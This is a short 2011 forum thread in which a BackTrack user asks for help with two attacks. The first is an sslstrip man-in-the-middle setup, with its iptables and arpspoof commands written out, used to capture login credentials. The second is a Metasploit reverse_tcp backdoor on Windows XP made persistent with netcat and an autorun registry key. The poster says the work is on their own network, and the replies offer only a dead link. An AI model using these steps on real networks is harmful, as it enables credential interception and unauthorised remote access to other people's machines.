
Thread: sslstrip & Netcat backdooring

  1. #1

    Hey guys!

    I'm new to Backtrack and so I'm facing some problems:

    (I apply everything at home in my own network!)

    SSLSTRIP:
    I use the following commands:
    1. echo 1 > /proc/sys/net/ipv4/ip_forward
    2. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
    3. cd /pentest/web/sslstrip/
    4. python sslstrip.py -p -l 10000 -w /root/Desktop/capture.txt
    5. arpspoof -i eth0 -t <target ip> <gateway ip>


    Backtrack is running on my Mac with VMware!

    If I sniff the https sites of the Mac, everything works nicely and I get the usernames and the passwords in plain text. But if I sniff my real Win XP (SP3) PC, sslstrip captures nonsense in the /root/Desktop/capture.txt file - I think it captures SSL-secured data!
    That's strange, because if I open Facebook (on the Win XP machine), the URL shows HTTP and not HTTPS, so it should work. On the other hand, if I visit Gmail or something else, the HTTPS is still there (I'm using sslstrip 0.9 - the Gmail bug should be gone).

    Metasploit - backdooring:

    I got into the Win XP machine with a hidden exploit in an .exe file with windows/meterpreter/reverse_tcp as PAYLOAD. Everything works perfectly - creating a session, uploading netcat (nc.exe), creating a new value in the autorun registry for the backdoor (nc) - until I reboot the remote PC. I can't connect with the command "nc <victim ip> <port>" any more.


    I hope you know what to do.
    Last edited by Stallh0f3n; 12-17-2011 at 01:33 PM.

  2. #2
    zimmaro

    Hi,
    for netcat, try taking a look in the video section of the forum (3rd page, at the bottom).
    I did a test with BT5, and "we had opened a thread":
    http://www.backtrack-linux.org/forum...ad.php?t=41488
    Bye

  3. #3

    Originally posted by zimmaro:
        Hi,
        for netcat, try taking a look in the video section of the forum (3rd page, at the bottom).
        I did a test with BT5, and "we had opened a thread":
        http://www.backtrack-linux.org/forum...ad.php?t=41488
        Bye

    "Page not found"
